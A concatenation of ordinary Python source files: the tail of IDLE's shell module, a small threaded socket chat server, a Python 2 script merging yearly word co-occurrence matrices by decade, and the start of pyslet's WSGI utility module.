self.set_debugger_indicator()
def beginexecuting(self):
"Helper for ModifiedInterpreter"
self.resetoutput()
self.executing = True
def endexecuting(self):
"Helper for ModifiedInterpreter"
self.executing = False
self.canceled = False
self.showprompt()
def close(self):
"Extend EditorWindow.close()"
if self.executing:
response = tkMessageBox.askokcancel(
"Kill?",
"Your program is still running!\n Do you want to kill it?",
default="ok",
parent=self.text)
if response is False:
return "cancel"
self.stop_readline()
self.canceled = True
self.closing = True
return EditorWindow.close(self)
def _close(self):
"Extend EditorWindow._close(), shut down debugger and execution server"
self.close_debugger()
if use_subprocess:
self.interp.kill_subprocess()
# Restore std streams
sys.stdout = self.save_stdout
sys.stderr = self.save_stderr
sys.stdin = self.save_stdin
# Break cycles
self.interp = None
self.console = None
self.flist.pyshell = None
self.history = None
EditorWindow._close(self)
def ispythonsource(self, filename):
"Override EditorWindow method: never remove the colorizer"
return True
def short_title(self):
return self.shell_title
COPYRIGHT = \
'Type "help", "copyright", "credits" or "license()" for more information.'
def begin(self):
self.text.mark_set("iomark", "insert")
self.resetoutput()
if use_subprocess:
nosub = ''
client = self.interp.start_subprocess()
if not client:
self.close()
return False
else:
nosub = ("==== No Subprocess ====\n\n" +
"WARNING: Running IDLE without a Subprocess is deprecated\n" +
"and will be removed in a later version. See Help/IDLE Help\n" +
"for details.\n\n")
sys.displayhook = rpc.displayhook
self.write("Python %s on %s\n%s\n%s" %
(sys.version, sys.platform, self.COPYRIGHT, nosub))
self.text.focus_force()
self.showprompt()
# User code should use separate default Tk root window
import tkinter
tkinter._support_default_root = True
tkinter._default_root = None
return True
def stop_readline(self):
if not self.reading: # no nested mainloop to exit.
return
self._stop_readline_flag = True
self.top.quit()
def readline(self):
save = self.reading
try:
self.reading = True
self.top.mainloop() # nested mainloop()
finally:
self.reading = save
if self._stop_readline_flag:
self._stop_readline_flag = False
return ""
line = self.text.get("iomark", "end-1c")
if len(line) == 0: # may be EOF if we quit our mainloop with Ctrl-C
line = "\n"
self.resetoutput()
if self.canceled:
self.canceled = False
if not use_subprocess:
raise KeyboardInterrupt
if self.endoffile:
self.endoffile = False
line = ""
return line
def isatty(self):
return True
def cancel_callback(self, event=None):
try:
if self.text.compare("sel.first", "!=", "sel.last"):
return # Active selection -- always use default binding
except:
pass
if not (self.executing or self.reading):
self.resetoutput()
self.interp.write("KeyboardInterrupt\n")
self.showprompt()
return "break"
self.endoffile = False
self.canceled = True
if (self.executing and self.interp.rpcclt):
if self.interp.getdebugger():
self.interp.restart_subprocess()
else:
self.interp.interrupt_subprocess()
if self.reading:
self.top.quit() # exit the nested mainloop() in readline()
return "break"
def eof_callback(self, event):
if self.executing and not self.reading:
return # Let the default binding (delete next char) take over
if not (self.text.compare("iomark", "==", "insert") and
self.text.compare("insert", "==", "end-1c")):
return # Let the default binding (delete next char) take over
if not self.executing:
self.resetoutput()
self.close()
else:
self.canceled = False
self.endoffile = True
self.top.quit()
return "break"
def linefeed_callback(self, event):
# Insert a linefeed without entering anything (still autoindented)
if self.reading:
self.text.insert("insert", "\n")
self.text.see("insert")
else:
self.newline_and_indent_event(event)
return "break"
def enter_callback(self, event):
if self.executing and not self.reading:
return # Let the default binding (insert '\n') take over
# If some text is selected, recall the selection
# (but only if this before the I/O mark)
try:
sel = self.text.get("sel.first", "sel.last")
if sel:
if self.text.compare("sel.last", "<=", "iomark"):
self.recall(sel, event)
return "break"
except:
pass
# If we're strictly before the line containing iomark, recall
# the current line, less a leading prompt, less leading or
# trailing whitespace
if self.text.compare("insert", "<", "iomark linestart"):
# Check if there's a relevant stdin range -- if so, use it
prev = self.text.tag_prevrange("stdin", "insert")
if prev and self.text.compare("insert", "<", prev[1]):
self.recall(self.text.get(prev[0], prev[1]), event)
return "break"
next = self.text.tag_nextrange("stdin", "insert")
if next and self.text.compare("insert lineend", ">=", next[0]):
self.recall(self.text.get(next[0], next[1]), event)
return "break"
# No stdin mark -- just get the current line, less any prompt
indices = self.text.tag_nextrange("console", "insert linestart")
if indices and \
self.text.compare(indices[0], "<=", "insert linestart"):
self.recall(self.text.get(indices[1], "insert lineend"), event)
else:
self.recall(self.text.get("insert linestart", "insert lineend"), event)
return "break"
# If we're between the beginning of the line and the iomark, i.e.
# in the prompt area, move to the end of the prompt
if self.text.compare("insert", "<", "iomark"):
self.text.mark_set("insert", "iomark")
# If we're in the current input and there's only whitespace
# beyond the cursor, erase that whitespace first
s = self.text.get("insert", "end-1c")
if s and not s.strip():
self.text.delete("insert", "end-1c")
# If we're in the current input before its last line,
# insert a newline right at the insert point
if self.text.compare("insert", "<", "end-1c linestart"):
self.newline_and_indent_event(event)
return "break"
# We're in the last line; append a newline and submit it
self.text.mark_set("insert", "end-1c")
if self.reading:
self.text.insert("insert", "\n")
self.text.see("insert")
else:
self.newline_and_indent_event(event)
self.text.tag_add("stdin", "iomark", "end-1c")
self.text.update_idletasks()
if self.reading:
self.top.quit() # Break out of recursive mainloop()
else:
self.runit()
return "break"
def recall(self, s, event):
# remove leading and trailing empty or whitespace lines
s = re.sub(r'^\s*\n', '' , s)
s = re.sub(r'\n\s*$', '', s)
lines = s.split('\n')
self.text.undo_block_start()
try:
self.text.tag_remove("sel", "1.0", "end")
self.text.mark_set("insert", "end-1c")
prefix = self.text.get("insert linestart", "insert")
if prefix.rstrip().endswith(':'):
self.newline_and_indent_event(event)
prefix = self.text.get("insert linestart", "insert")
self.text.insert("insert", lines[0].strip())
if len(lines) > 1:
orig_base_indent = re.search(r'^([ \t]*)', lines[0]).group(0)
new_base_indent = re.search(r'^([ \t]*)', prefix).group(0)
for line in lines[1:]:
if line.startswith(orig_base_indent):
# replace orig base indentation with new indentation
line = new_base_indent + line[len(orig_base_indent):]
self.text.insert('insert', '\n'+line.rstrip())
finally:
self.text.see("insert")
self.text.undo_block_stop()
def runit(self):
line = self.text.get("iomark", "end-1c")
# Strip off last newline and surrounding whitespace.
# (To allow you to hit return twice to end a statement.)
i = len(line)
while i > 0 and line[i-1] in " \t":
i = i-1
if i > 0 and line[i-1] == "\n":
i = i-1
while i > 0 and line[i-1] in " \t":
i = i-1
line = line[:i]
self.interp.runsource(line)
def open_stack_viewer(self, event=None):
if self.interp.rpcclt:
return self.interp.remote_stack_viewer()
try:
sys.last_traceback
except:
tkMessageBox.showerror("No stack trace",
"There is no stack trace yet.\n"
"(sys.last_traceback is not defined)",
parent=self.text)
return
from idlelib.stackviewer import StackBrowser
StackBrowser(self.root, self.flist)
def view_restart_mark(self, event=None):
self.text.see("iomark")
self.text.see("restart")
def restart_shell(self, event=None):
"Callback for Run/Restart Shell Cntl-F6"
self.interp.restart_subprocess(with_cwd=True)
def showprompt(self):
self.resetoutput()
self.console.write(self.prompt)
self.text.mark_set("insert", "end-1c")
self.set_line_and_column()
self.io.reset_undo()
def show_warning(self, msg):
width = self.interp.tkconsole.width
wrapper = TextWrapper(width=width, tabsize=8, expand_tabs=True)
wrapped_msg = '\n'.join(wrapper.wrap(msg))
if not wrapped_msg.endswith('\n'):
wrapped_msg += '\n'
self.per.bottom.insert("iomark linestart", wrapped_msg, "stderr")
def resetoutput(self):
source = self.text.get("iomark", "end-1c")
if self.history:
self.history.store(source)
if self.text.get("end-2c") != "\n":
self.text.insert("end-1c", "\n")
self.text.mark_set("iomark", "end-1c")
self.set_line_and_column()
self.ctip.remove_calltip_window()
def write(self, s, tags=()):
try:
self.text.mark_gravity("iomark", "right")
count = OutputWindow.write(self, s, tags, "iomark")
self.text.mark_gravity("iomark", "left")
except:
raise ###pass # ### 11Aug07 KBK if we are expecting exceptions
# let's find out what they are and be specific.
if self.canceled:
self.canceled = False
if not use_subprocess:
raise KeyboardInterrupt
return count
def rmenu_check_cut(self):
try:
if self.text.compare('sel.first', '<', 'iomark'):
return 'disabled'
except TclError: # no selection, so the index 'sel.first' doesn't exist
return 'disabled'
return super().rmenu_check_cut()
def rmenu_check_paste(self):
if self.text.compare('insert','<','iomark'):
return 'disabled'
return super().rmenu_check_paste()
def fix_x11_paste(root):
"Make paste replace selection on x11. See issue #5124."
if root._windowingsystem == 'x11':
for cls in 'Text', 'Entry', 'Spinbox':
root.bind_class(
cls,
'<<Paste>>',
'catch {%W delete sel.first sel.last}\n' +
root.bind_class(cls, '<<Paste>>'))
usage_msg = """\
USAGE: idle [-deins] [-t title] [file]*
idle [-dns] [-t title] (-c cmd | -r file) [arg]*
idle [-dns] [-t title] - [arg]*
-h print this help message and exit
-n run IDLE without a subprocess (DEPRECATED,
see Help/IDLE Help for details)
The following options will override the IDLE 'settings' configuration:
-e open an edit window
-i open a shell window
The following options imply -i and will open a shell:
-c cmd run the command in a shell, or
-r file run script from file
-d enable the debugger
-s run $IDLESTARTUP or $PYTHONSTARTUP before anything else
-t title set title of shell window
A default edit window will be bypassed when -c, -r, or - are used.
[arg]* are passed to the command (-c) or script (-r) in sys.argv[1:].
Examples:
idle
Open an edit window or shell depending on IDLE's configuration.
idle foo.py foobar.py
Edit the files, also open a shell if configured to start with shell.
idle -est "Baz" foo.py
Run $IDLESTARTUP or $PYTHONSTARTUP, edit foo.py, and open a shell
window with the title "Baz".
idle -c "import sys; print(sys.argv)" "foo"
Open a shell window and run the command, passing "-c" in sys.argv[0]
and "foo" in sys.argv[1].
idle -d -s -r foo.py "Hello World"
Open a shell window, run a startup script, enable the debugger, and
run foo.py, passing "foo.py" in sys.argv[0] and "Hello World" in
sys.argv[1].
echo "import sys; print(sys.argv)" | idle - "foobar"
Open a shell window, run the script piped in, passing '' in sys.argv[0]
and "foobar" in sys.argv[1].
"""
def main():
import getopt
from platform import system
from idlelib import testing # bool value
from idlelib import macosx
global flist, root, use_subprocess
capture_warnings(True)
use_subprocess = True
enable_shell = False
enable_edit = False
debug = False
cmd = None
script = None
startup = False
try:
opts, args = getopt.getopt(sys.argv[1:], "c:deihnr:st:")
except getopt.error as msg:
print("Error: %s\n%s" % (msg, usage_msg), file=sys.stderr)
sys.exit(2)
for o, a in opts:
if o == '-c':
cmd = a
enable_shell = True
if o == '-d':
debug = True
enable_shell = True
if o == '-e':
enable_edit = True
if o == '-h':
sys.stdout.write(usage_msg)
sys.exit()
if o == '-i':
enable_shell = True
if o == '-n':
print(" Warning: running IDLE without a subprocess is deprecated.",
file=sys.stderr)
use_subprocess = False
if o == '-r':
script = a
if os.path.isfile(script):
pass
else:
print("No script file: ", script)
sys.exit()
enable_shell = True
if o == '-s':
startup = True
enable_shell = True
if o == '-t':
PyShell.shell_title = a
enable_shell = True
if args and args[0] == '-':
cmd = sys.stdin.read()
enable_shell = True
# process sys.argv and sys.path:
for i in range(len(sys.path)):
sys.path[i] = os.path.abspath(sys.path[i])
if args and args[0] == '-':
sys.argv = [''] + args[1:]
elif cmd:
sys.argv = ['-c'] + args
elif script:
sys.argv = [script] + args
elif args:
enable_edit = True
pathx = []
for filename in args:
pathx.append(os.path.dirname(filename))
for dir in pathx:
dir = os.path.abspath(dir)
if not dir in sys.path:
sys.path.insert(0, dir)
else:
dir = os.getcwd()
if dir not in sys.path:
sys.path.insert(0, dir)
# check the IDLE settings configuration (but command line overrides)
edit_start = idleConf.GetOption('main', 'General',
'editor-on-startup', type='bool')
enable_edit = enable_edit or edit_start
enable_shell = enable_shell or not enable_edit
# Setup root. Don't break user code run in IDLE process.
# Don't change environment when testing.
if use_subprocess and not testing:
NoDefaultRoot()
root = Tk(className="Idle")
root.withdraw()
from idlelib.run import fix_scaling
fix_scaling(root)
# set application icon
icondir = os.path.join(os.path.dirname(__file__), 'Icons')
if system() == 'Windows':
iconfile = os.path.join(icondir, 'idle.ico')
root.wm_iconbitmap(default=iconfile)
elif not macosx.isAquaTk():
if TkVersion >= 8.6:
ext = '.png'
sizes = (16, 32, 48, 256)
else:
ext = '.gif'
sizes = (16, 32, 48)
iconfiles = [os.path.join(icondir, 'idle_%d%s' % (size, ext))
for size in sizes]
icons = [PhotoImage(master=root, file=iconfile)
for iconfile in iconfiles]
root.wm_iconphoto(True, *icons)
# start editor and/or shell windows:
fixwordbreaks(root)
fix_x11_paste(root)
flist = PyShellFileList(root)
macosx.setupApp(root, flist)
if enable_edit:
if not (cmd or script):
for filename in args[:]:
if flist.open(filename) is None:
# filename is a directory actually, disconsider it
args.remove(filename)
if not args:
flist.new()
if enable_shell:
shell = flist.open_shell()
if not shell:
return # couldn't open shell
if macosx.isAquaTk() and flist.dict:
# On OSX: when the user has double-clicked on a file that causes
# IDLE to be launched the shell window will open just in front of
# the file she wants to see. Lower the interpreter window when
# there are open files.
shell.top.lower()
else:
shell = flist.pyshell
# Handle remaining options. If any of these are set, enable_shell
# was set also, so shell must be true to reach here.
if debug:
shell.open_debugger()
if startup:
filename = os.environ.get("IDLESTARTUP") or \
os.environ.get("PYTHONSTARTUP")
if filename and os.path.isfile(filename):
shell.interp.execfile(filename)
if cmd or script:
shell.interp.runcommand("""if 1:
import sys as _sys
_sys.argv = %r
del _sys
\n""" % (sys.argv,))
if cmd:
shell.interp.execsource(cmd)
elif script:
shell.interp.prepend_syspath(script)
shell.interp.execfile(script)
elif shell:
# If there is a shell window and no cmd or script in progress,
# check for problematic issues and print warning message(s) in
# the IDLE shell window; this is less intrusive than always
# opening a separate window.
# Warn if using a problematic OS X Tk version.
tkversionwarning = macosx.tkVersionWarning(root)
if tkversionwarning:
shell.show_warning(tkversionwarning)
# Warn if the "Prefer tabs when opening documents" system
# preference is set to "Always".
prefer_tabs_preference_warning = macosx.preferTabsPreferenceWarning()
if prefer_tabs_preference_warning:
shell.show_warning(prefer_tabs_preference_warning)
while flist.inversedict: # keep IDLE running while files are open.
root.mainloop()
root.destroy()
capture_warnings(False)
if __name__ == "__main__":
main()
capture_warnings(False) # Make sure turned off; see issue 18081
|
socket_server.py
|
"""
0。 实例化服务端,绑定窗口,监听
1。 接受连接请求,创建并返回
2。 接收客户端发送过来的信息
3。 向客户端发送信息
注意,socket通信传输的信息是字节码,并且双方都可以关闭通信
"""
import socket
import threading
# 实例化服务端
server = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
# 绑定
server.bind(('0.0.0.0', 6959))
# 监听
server.listen(5)
def handle_sock(sock):
while True:
# 接收来自客户端的数据
recv_data = sock.recv(1024) # bufsize 指定数据流大小为1024字节
print(recv_data.decode("utf8"))
# 回复信息给客户端
res_data = input()
sock.send(res_data.encode("utf8"))
while True:
# 接收客户端连接请求,并建立连接
sock, __ = server.accept()
# 用线程去处理新接收的连接(用户)
client_thread = threading.Thread(target=handle_sock, args=(sock,))
client_thread.start()
|
makedecades.py
|
import argparse
import collections
from multiprocessing import Process, Queue
from Queue import Empty
from vecanalysis.representations.explicit import Explicit
from cooccurrence.matstore import export_mat_from_dict
from ioutils import mkdir, write_pickle, load_pickle
def get_index(merged_index, year_list, index):
word = year_list[index]
if word in merged_index:
new_index = merged_index[word]
else:
new_index = len(merged_index)
merged_index[word] = new_index
return new_index
def worker(proc_num, queue, out_dir, in_dir):
while True:
try:
decade = queue.get(block=False)
except Empty:
break
print "Processing decade", decade
counts = collections.defaultdict(int)
for year in range(10):
embed = Explicit.load(in_dir + str(decade + year) + ".bin", normalize=False)
if year == 0:
merged_index = embed.wi
year_list = load_pickle(in_dir + str(decade + year) + "-list.pkl")
mat = embed.m.tocoo()
for i in xrange(len(mat.data)):
if mat.data[i] == 0:
continue
new_row = get_index(merged_index, year_list, mat.row[i])
new_col = get_index(merged_index, year_list, mat.col[i])
counts[(new_row, new_col)] += mat.data[i]
print "Done year ", decade + year
export_mat_from_dict(counts, decade, out_dir)
write_pickle(merged_index, out_dir + str(decade) + "-index.pkl")
write_pickle(list(merged_index), out_dir + str(decade) + "-list.pkl")
def run_parallel(num_procs, out_dir, in_dir, decades):
queue = Queue()
for decade in decades:
queue.put(decade)
procs = [Process(target=worker, args=[i, queue, out_dir, in_dir]) for i in range(num_procs)]
for p in procs:
p.start()
for p in procs:
p.join()
if __name__ == '__main__':
parser = argparse.ArgumentParser(description="Merges years of raw 5gram data.")
parser.add_argument("out_dir", help="path to network data (also where output goes)")
parser.add_argument("in_dir", help="path to network data (also where output goes)")
parser.add_argument("num_procs", type=int, help="number of processes to spawn")
parser.add_argument("--start-year", type=int, help="start year (inclusive)")
parser.add_argument("--end-year", type=int, help="end year (inclusive)")
args = parser.parse_args()
decades = range(args.start_year, args.end_year + 1, 10)
decades.reverse()
mkdir(args.out_dir)
run_parallel(args.num_procs, args.out_dir + "/", args.in_dir + "/", decades)
|
wsgi.py
|
#! /usr/bin/env python
"""Utilities for writing applications based on wsgi"""
import base64
import binascii
import cgi
import io
import json
import logging
import mimetypes
import optparse
import os
import quopri
import random
import sys
import threading
import time
import traceback
from hashlib import sha256
from wsgiref.simple_server import make_server
from . import iso8601 as iso
from .http import (
cookie,
messages,
params)
from .odata2 import (
core as odata,
csdl as edm,
metadata as edmx)
from .odata2.sqlds import SQLEntityContainer
from .py2 import (
byte_value,
dict_items,
force_ascii,
force_bytes,
input3,
is_ascii,
is_text,
is_unicode,
long2,
parse_qs,
range3,
to_text,
UnicodeMixin,
urlencode,
urlquote)
from .rfc2396 import (
escape_data,
FileURL,
unescape_data,
URI)
from .xml import structures as xml
from .vfs import OSFilePath
try:
from Crypto.Cipher import AES
from Crypto import Random
got_crypto = True
except ImportError:
got_crypto = False
logger = logging.getLogger('pyslet.wsgi')
class BadRequest(Exception):
"""An exception that will generate a 400 response code"""
pass
class PageNotAuthorized(BadRequest):
"""An exception that will generate a 403 response code"""
pass
class PageNotFound(BadRequest):
"""An exception that will generate a 404 response code"""
pass
class MethodNotAllowed(BadRequest):
"""An exception that will generate a 405 response code"""
pass
class SessionError(RuntimeError):
"""Unexpected session handling error"""
pass
def generate_key(key_length=128):
"""Generates a new key
key_length
The minimum key length in bits. Defaults to 128.
The key is returned as a sequence of 16 bit hexadecimal
strings separated by '.' to make them easier to read and
transcribe into other systems."""
key = []
if key_length < 1:
raise ValueError("wsgi.generate_key(%i)" % key_length)
nfours = (key_length + 15) // 16
try:
rbytes = os.urandom(nfours * 2)
for i in range3(nfours):
four = "%02X%02X" % (
byte_value(rbytes[2 * i]), byte_value(rbytes[2 * i + 1]))
key.append(four)
except NotImplementedError:
logger.warning("urandom required for secure key generation")
for i in range3(nfours):
four = []
for j in range3(4):
four.append(random.choice('0123456789ABCDEF'))
key.append(''.join(four))
return '.'.join(key)
def key60(src):
"""Generates a non-negative 60-bit long from a source string.
src
A binary string.
The idea behind this function is to create an (almost) unique
integer from a given string. The integer can then be used as the
key field of an associated entity without having to create foreign
keys that are long strings. There is of course a small chance that
two source strings will result in the same integer.
The integer is calculated by truncating the SHA256 hexdigest to 15
characters (60-bits) and then converting to long. Future versions
of Python promise improvements here, which would allow us to squeeze
an extra 3 bits using int.from_bytes but alas, not in Python 2.x"""
return long2(sha256(src).hexdigest()[0:15], 16)
class WSGIContext(object):
"""A class used for managing WSGI calls
environ
The WSGI environment
start_response
The WSGI call-back
canonical_root
A URL that overrides the automatically derived canonical root,
see :class:`WSGIApp` for more details.
This class acts as a holding place for information specific to each
request being handled by a WSGI-based application. In some
frameworks this might be called the request object but we already
have requests modelled in the http package and, anyway, this holds
information about the WSGI environment and the response too."""
#: The maximum amount of content we'll read into memory (64K)
MAX_CONTENT = 64 * 1024
def __init__(self, environ, start_response, canonical_root=None):
#: the WSGI environ
self.environ = environ
#: the WSGI start_response callable
self.start_response_method = start_response
#: the response status code (an integer), see :meth:`set_status`
self.status = None
#: the response status message (a string), see :meth:`set_status`
self.status_message = None
#: a *list* of (name, value) tuples containing the headers to
#: return to the client. name and value must be strings
self.headers = []
if canonical_root is None:
self._canonical_root = self._get_canonical_root()
else:
self._canonical_root = canonical_root
self._query = None
self._content = None
self._form = None
self._cookies = None
def set_status(self, code):
"""Sets the status of the response
code
An HTTP *integer* response code.
This method sets the :attr:`status_message` automatically from
the code. You must call this method before calling
start_response."""
self.status = code
self.status_message = messages.Response.REASON.get(code, "Unknown")
def add_header(self, name, value):
"""Adds a header to the response
name
The name of the header (a string)
value
The value of the header (a string)"""
self.headers.append((name, value))
def start_response(self):
"""Calls the WSGI start_response method
If the :attr:`status` has not been set a 500 response is
generated. The status string is created automatically from
:attr:`status` and :attr:`status_message` and the headers are
set from :attr:`headers`.
The return value is the return value of the WSGI start_response
call, an obsolete callable that older applications use to write
the body data of the response.
If you want to use the exc_info mechanism you must call
start_response yourself directly using the value of
:attr:`start_response_method`"""
if self.status is None:
self.status = 500
self.status_message = messages.Response.REASON.get(500,
"No status")
return self.start_response_method(
"%i %s" % (self.status, self.status_message), self.headers)
def get_app_root(self):
"""Returns the root of this application
The result is a :class:`pyslet.rfc2396.URI` instance, It is
calculated from the environment in the same way as
:meth:`get_url` but only examines the SCRIPT_NAME portion of the
path.
It always ends in a trailing slash. So if you have a script
bound to /script/myscript.py running over http on
www.example.com then you will get::
http://www.example.com/script/myscript.py/
This allows you to generate absolute URLs by resolving them relative
to the computed application root, e.g.::
URI.from_octets('images/counter.png').resolve(
context.get_app_root())
would return::
http://www.example.com/script/myscript.py/images/counter.png
for the above example. This is preferable to using absolute
paths which would strip away the SCRIPT_NAME prefix when used."""
url = [self._canonical_root]
script = urlquote(self.environ.get('SCRIPT_NAME', ''))
if not script:
url.append('/')
else:
url.append(script)
# we always add the slash, that's our root URL
if script[-1] != '/':
url.append('/')
return URI.from_octets(''.join(url))
def get_url(self):
"""Returns the URL used in the request
The result is a :class:`pyslet.rfc2396.URI` instance, It is
calculated from the environment using the algorithm described in
URL Reconstruction section of the WSGI specification except
that it ignores the Host header for security reasons.
Unlike the result of :meth:`get_app_root` it *doesn't*
necessarily end with a trailing slash. So if you have a script
bound to /script/myscript.py running over http on
www.example.com then you may get::
http://www.example.com/script/myscript.py
A good pattern to adopt when faced with a missing trailing slash
on a URL that is intended to behave as a 'directory' is to add
the slash to the URL and use xml:base (for XML responses) or
HTML's <base> tag to set the root for relative links. The
alternative is to issue an explicit redirect but this requires
another request from the client.
This causes particular pain in OData services which frequently
respond on the service script's URL without a slash but generate
incorrect relative links to the contained feeds as a result."""
url = [self._canonical_root]
url.append(urlquote(self.environ.get('SCRIPT_NAME', '')))
url.append(urlquote(self.environ.get('PATH_INFO', '')))
query = self.environ.get('QUERY_STRING', '')
if query:
url += ['?', query]
return URI.from_octets(''.join(url))
def _get_canonical_root(self):
url = [self.environ['wsgi.url_scheme'], '://']
sflag = (self.environ['wsgi.url_scheme'] == 'https')
authority = self.environ['SERVER_NAME']
port = self.environ['SERVER_PORT']
if sflag:
if port != '443':
url.append("%s:%s" % (authority, port))
else:
url.append(authority)
elif port != '80':
url.append("%s:%s" % (authority, port))
else:
url.append(authority)
return ''.join(url)
def get_query(self):
"""Returns a dictionary of query parameters
The dictionary maps parameter names onto strings. In cases
where multiple values have been supplied the values are comma
separated, so a URL ending in ?option=Apple&option=Pear would
result in the dictionary::
{'option': 'Apple,Pear'}
This method only computes the dictionary once, future calls
return the same dictionary!
Note that the dictionary does not contain any cookie values or
form parameters."""
if self._query is None:
self._query = parse_qs(
self.environ.get('QUERY_STRING', ''))
for n, v in list(dict_items(self._query)):
self._query[n] = ','.join(v)
return self._query
def get_content(self):
"""Returns the content of the request as a string
The content is read from the input, up to CONTENT_LENGTH bytes,
and is returned as a binary string. If the content exceeds
:attr:`MAX_CONTENT` (default: 64K) then BadRequest is raised.
This method can be called multiple times, the content is only
actually read from the input the first time. Subsequent calls
return the same string.
This call cannot be called on the same context as
:meth:`get_form`, whichever is called first takes precedence.
Calls to get_content after get_form return None."""
if self._form is None and self._content is None:
length = self.environ.get('CONTENT_LENGTH', '')
if length.isdigit():
length = int(length)
else:
length = 0
if length <= self.MAX_CONTENT:
input = self.environ['wsgi.input']
f = io.BytesIO()
while length:
part = input.read(length)
if not part:
break
f.write(part)
length -= len(part)
self._content = f.getvalue()
else:
raise BadRequest("Too much data")
return self._content
def get_form(self):
"""Returns a FieldStorage object parsed from the content.
The query string is excluded before the form is parsed as this
only covers parameters submitted in the content of the request.
To search the query string you will need to examine the
dictionary returned by :meth:`get_query` too.
This method can be called multiple times, the form is only
actually read from the input the first time. Subsequent calls
return the same FieldStorage object.
This call cannot be called on the same context as
:meth:`get_content`, whichever is called first takes
precedence. Calls to get_form after get_content return None.
Warning: get_form will only parse the form from the content if
the request method was POST!"""
if self._form is None and self._content is None:
post_environ = self.environ.copy()
post_environ['QUERY_STRING'] = ''
self._form = cgi.FieldStorage(
fp=post_environ['wsgi.input'], environ=post_environ,
keep_blank_values=True)
return self._form
def get_form_string(self, name, max_length=0x10000):
"""Returns the value of a string parameter from the form.
name
The name of the parameter
max_length (optional, defaults to 64KB)
Due to an issue in the implementation of FieldStorage it
isn't actually possible to definitively tell the difference
between a file upload and an ordinary input field. HTML5
clarifies the situation to say that ordinary fields don't
have a content type but FieldStorage assumes 'text/plain' in
this case and sets the file and type attribute of the field
anyway.
To prevent obtuse clients sending large files disguised as
ordinary form fields, tricking your application into loading
them into memory, this method checks the size of any file
attribute (if present) against max_length before returning
the field's value.
If the parameter is missing from the form then an empty string
is returned."""
form = self.get_form()
if name in form:
result = form[name]
if isinstance(result, list):
return ','.join([x.value for x in result])
else:
if result.file:
# could be an ordinary field in multipart/form-data
fpos = result.file.tell()
result.file.seek(0, io.SEEK_END)
fsize = result.file.tell()
result.file.seek(fpos)
if fsize > max_length:
raise BadRequest
# result.value could be bytes or (text) str
value = result.value
if isinstance(value, bytes):
charset = 'ascii'
if result.type_options is not None:
charset = result.type_options.get('charset',
'ascii')
return value.decode(charset)
else:
return value
return result.value
return ''
def get_form_long(self, name):
"""Returns the value of a (long) integer parameter from the form.
name
The name of the parameter
If the parameter is missing from the form then None is returned,
if the parameter is present but is not a valid integer then
:class:`BadRequest` is raised."""
value = self.get_form_string(name, 256)
try:
return long2(value)
except ValueError as err:
logging.debug("get_form_long: %s", str(err))
raise BadRequest
def get_cookies(self):
"""Returns a dictionary of cookies from the request
If no cookies were passed an empty dictionary is returned.
For details of how multi-valued cookies are handled see:
:meth:`pyslet.http.cookie.CookieParser.request_cookie_string`."""
if self._cookies is None:
cookie_values = self.environ.get('HTTP_COOKIE', None)
if cookie_values is not None:
p = cookie.CookieParser(cookie_values)
self._cookies = p.require_cookie_string()
for name in self._cookies:
value = self._cookies[name]
if isinstance(value, set):
# join the items into a single string
value = list(value)
value.sort()
self._cookies[name] = b','.join(value)
else:
self._cookies = {}
return self._cookies
class DispatchNode(object):
"""An opaque class used for dispatching requests."""
def __init__(self):
self._handler = None
self._wildcard = None
self._nodes = {}
class WSGIApp(DispatchNode):
"""An object to help support WSGI-based applications.
Instances are designed to be callable by the WSGI middle-ware, on
creation each instance is assigned a random identifier which is used
to provide comparison and hash implementations. We go to this
trouble so that derived classes can use techniques like the
functools lru_cache decorator in future versions."""
#: the context class to use for this application, must be (derived
#: from) :class:`WSGIContext`
ContextClass = WSGIContext
#: The path to the directory for :attr:`static_files`. Defaults to
#: None. An :class:`pyslet.vfs.OSFilePath` instance.
static_files = None
private_files = None
"""Private data diretory
An :class:`pyslet.vfs.OSFilePath` instance.
The directory used for storing private data. The directory is
partitioned into sub-directories based on the lower-cased class name
of the object that owns the data. For example, if private_files is
set to '/var/www/data' and you derive a class called 'MyApp' from
WSGIApp you can assume that it is safe to store and retrieve private
data files from '/var/www/data/myapp'.
private_files defaults to None for safety. The current WSGIApp
implementation does not depend on any private data."""
settings_file = None
"""The path to the settings file. Defaults to None.
An :class:`pyslet.vfs.OSFilePath` instance.
The format of the settings file is a json dictionary. The
dictionary's keys are class names that define a scope for
class-specific settings. The key 'WSGIApp' is reserved for settings
defined by this class. The defined settings are:
level (None)
If specified, used to set the root logging level, a value
between 0 (NOTSET) and 50 (CRITICAL). For more information see
python's logging module.
port (8080)
The port number used by :meth:`run_server`
canonical_root ("http://localhost" or "http://localhost:<port>")
The canonical URL scheme, host (and port if required) for the
application. This value is passed to the context and used by
:meth:`WSGIContext.get_url` and similar methods in preference to
the SERVER_NAME and SEVER_PORT to construct absolute URLs
returned or recorded by the application. Note that the Host
header is always ignored to prevent related `security attacks`__.
.. __:
http://www.skeletonscribe.net/2013/05/practical-http-host-header-attacks.html
If no value is given then the default is calculated taking in to
consideration the port setting.
interactive (False)
Sets the behaviour of :meth:`run_server`, if specified the main
thread prompts the user with a command line interface allowing
you to interact with the running server. When False, run_server
will run forever and can only be killed by an application
request that sets :attr:`stop` to True or by an external signal
that kills the process.
static (None)
A URL to the static files (not a local file path). This will
normally be an absolute path or a relative path. Relative paths
are relative to the settings file in which the setting is
defined. As URL syntax is used you must use the '/' as a path
separator and add proper URL-escaping. On Windows, UNC paths
can be specified by putting the host name in the authority
section of the URL.
private (None)
A URL to the private files. Interpreted as per the 'static'
setting above."""
#: the class settings loaded from :attr:`settings_file` by
#: :meth:`setup`
settings = None
#: the base URI of this class, set from the path to the settings
#: file itself and is used to locate data files on the server. This
#: is a :class:`pyslet.rfc2396.FileURL` instance. Not to be confused
#: with the base URI of resources exposed by the application this
#: class implements!
base = None
#: the base URI of this class' private files. This is set from the
#: :attr:`private_files` member and is a
#: :class:`pyslet.rfc2396.FileURL` instance
private_base = None
content_type = {
'ico': params.MediaType('image', 'vnd.microsoft.icon'),
}
"""The mime type mapping table.
This table is used before falling back on Python's built-in
guess_type function from the mimetypes module. Add your own custom
mappings here.
It maps file extension (without the dot) on to
:class:`~pyslet.http.params.MediaType` instances."""
#: the maximum chunk size to read into memory when returning a
#: (static) file. Defaults to 64K.
MAX_CHUNK = 0x10000
#: the integer millisecond time (since the epoch) corresponding to
#: 01 January 1970 00:00:00 UTC the JavaScript time origin.
js_origin = int(
iso.TimePoint(
date=iso.Date(century=19, year=70, month=1, day=1),
time=iso.Time(hour=0, minute=0, second=0, zdirection=0)
).get_unixtime() * 1000)
